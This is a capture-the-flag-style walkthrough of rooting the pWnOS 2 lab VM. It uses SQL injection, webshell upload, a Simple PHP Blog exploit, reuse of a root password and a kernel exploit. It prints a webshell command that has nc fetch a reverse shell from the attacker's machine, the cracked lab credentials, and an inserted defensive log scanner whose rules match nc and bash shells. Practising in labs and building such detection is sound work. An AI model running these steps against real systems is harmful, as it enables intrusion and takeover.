Overview
pWnOS 2 is a boot2root virtual machine designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting possible vulnerabilities, leading to full system compromise.
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM on a custom network with subnet 10.10.10.1/24 range
- pWnOS 2.0 VM on the same custom network with subnet 10.10.10.1/24. Static IP address of pWnOS 2.0 is 10.10.10.100
Kali Linux network settings
pwnOS network settings
Tools Used:
- Kali Linux VM
- Browser
- nc
- nmap
- burpsuite
Vulnerabilities Exploited:
- SQL injection
- Shell upload via SQL injection (database misconfiguration)
- System misconfiguration: reuse of the root password
- Linux Kernel 2.6.32 < 3.x (CentOS 5/6) – ‘PERF_EVENTS’ Local Privilege Escalation
Reconnaissance
Target VM IP Address: 10.10.10.100
Scanning
nmap
# nmap -p- -A -oX nmap-pwnOS2.xml --webxml 10.10.10.100
Nmap findings:
- Target OS is Linux 2.6.32 – 2.6.39
- OpenSSH 5.8p1 is installed on port 22
- Apache httpd 2.2.17 is installed on port 80
Exploit path 1 for shell: SQL Injection
Let's explore the website in the browser.
Login page; let's check for SQL injection.
See! We found SQL injection. Also note down the absolute path of the website on the server, '/var/www/login.php'. Using the SQL injection, we can try uploading a webshell to this disclosed local path.
Now it is time for Burp Suite to exploit the SQL injection.
After database enumeration, we found:
database: ch16
table: users
columns of the users table: user_id, first_name, last_name, email, pass, user_level, active
Let's crack the hash for Dan, and guess what, I found the cleartext password for the given hash at hashkiller.co.uk. The cleartext password is killerbeesareflying.
After logging in with admin@isints.com:killerbeesareflying there is not much we can do except see a WAF warning message.
Let's analyse further to find another way. We can read local files through the injection, and from them we learn there is a user dan on the local machine.
Let's upload a shell using the SQL injection.
Confirm the webshell is uploaded successfully. Confirming in Burp Suite.
Confirming the shell is uploaded, in the browser.
Yes! The webshell is uploaded successfully.
Next step: find a writable directory on the server. After exploring, I found the /var/www/blog/config directory writable by www-data.
Time to get an interactive shell. Let's see if nc is available on the server.
nc is available.
Let's upload php-reverse-shell.php by pentestmonkey. You can find this webshell in Kali Linux at /usr/share/webshells/php/php-reverse-shell.php
Configure ip:port to point at the Kali Linux attacking machine.
Transfer the reverse shell to the target VM.
http://10.10.10.100/shell7.php?cmd=nc 10.10.10.128 8888 > /var/www/blog/config/rshell.php&
Confirm rshell is uploaded.
Listening for the php-reverse-shell netcat connection.
Open rshell in the browser to execute the shell.
And we got a shell.
Break out of the jail shell.
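A defender-side view of the requests this path generates, added here as an example that is not part of the original walkthrough: a small scanner over constructed Apache access-log lines (the IPs, timestamps and paths are assumed to mirror the post) that flags the file-reading SQL injection, the `cmd=` webshell call that drops rshell.php, and any PHP file being served from the blog's writable config directory.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log lines (not from the original post) that mirror the
# requests the walkthrough makes against pWnOS 2: 10.10.10.100 is the target,
# 10.10.10.128 the attacking Kali box.
SAMPLE_LOG = """\
10.10.10.128 - - [10/Oct/2023:12:00:01 +0000] "GET /login.php HTTP/1.1" 200 1342
10.10.10.128 - - [10/Oct/2023:12:01:15 +0000] "GET /index.php?id=1%27+UNION+SELECT+LOAD_FILE(%27/var/www/login.php%27)-- HTTP/1.1" 200 5120
10.10.10.128 - - [10/Oct/2023:12:03:40 +0000] "GET /shell7.php?cmd=nc+10.10.10.128+8888+%3E+/var/www/blog/config/rshell.php%26 HTTP/1.1" 200 12
10.10.10.128 - - [10/Oct/2023:12:04:02 +0000] "GET /blog/config/rshell.php HTTP/1.1" 200 0
10.10.10.1 - - [10/Oct/2023:12:05:00 +0000] "GET /blog/index.php?y=23&m=10 HTTP/1.1" 200 8891
"""

# Combined log format: source, identd, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (name, regex applied to the URL-decoded request target).
RULES = [
    ("sqli-file-access",  re.compile(r"union\s+select|load_file\s*\(|into\s+(out|dump)file", re.I)),
    ("webshell-command",  re.compile(r"[?&]cmd=.*(\bnc\b|\bnetcat\b|/bin/sh|bash\s+-i)", re.I)),
    ("php-in-config-dir", re.compile(r"^/blog/config/[^?]*\.php", re.I)),
]

def scan_log(text):
    """Return one finding dict per (line, rule) match.
    Caveat: POST bodies are not in the access log, so injection sent to login.php
    via POST needs ModSecurity audit logging or application-side logging;
    this scanner only sees the request line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = unquote_plus(m.group("target"))  # decode %27, +, %3E, %26 ...
        for name, rx in RULES:
            if rx.search(target):
                findings.append({"line": lineno, "rule": name, "src": m.group("src"), "target": target})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>3} {f['rule']:<18} {f['src']} {f['target']}")
```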
Exploit path 2 for Shell: Exploiting multiple vulnerabilities in Simple PHP Blog
Let's check for other directories on the server with dirb.
# dirb http://10.10.10.100
With nikto, we found a directory "blog".
This is "Simple PHP Blog 0.4.0".
Let's google for any available exploit for "Simple PHP Blog 0.4.0".
Exploit link: https://www.exploit-db.com/exploits/1191/
Or use searchsploit to find the exploit for Simple PHP Blog.
Let's try the Multiple Remote exploit.
Let's upload cmd.php.
./sphpblog.pl -h http://10.10.10.100/blog -e 1
Let's explore the shell in the browser.
We can execute commands. Again, we can upload a reverse shell in PHP and get an interactive shell with nc as we did above. I am not going to repeat the same. Let's go for privilege escalation.
Privilege Escalation 1: Misconfiguration
We found the DB root username and password in the mysqli_connect.php file in the /var/ directory:
root:root@ISIntS
Let's reuse these credentials for secure shell (SSH).
Congrats! We are root!
Privilege Escalation 2: Kernel exploit
Let's check the kernel version.
There is a perf_events exploit for this kernel that works.
I uploaded this exploit using nc. Now, let's try this exploit.
Congrats! We are root!
Conclusion:
This is a great Boot2Root VM. Rooting this VM, I learned and enjoyed a lot.
Awesome work sir
Thanks Brother.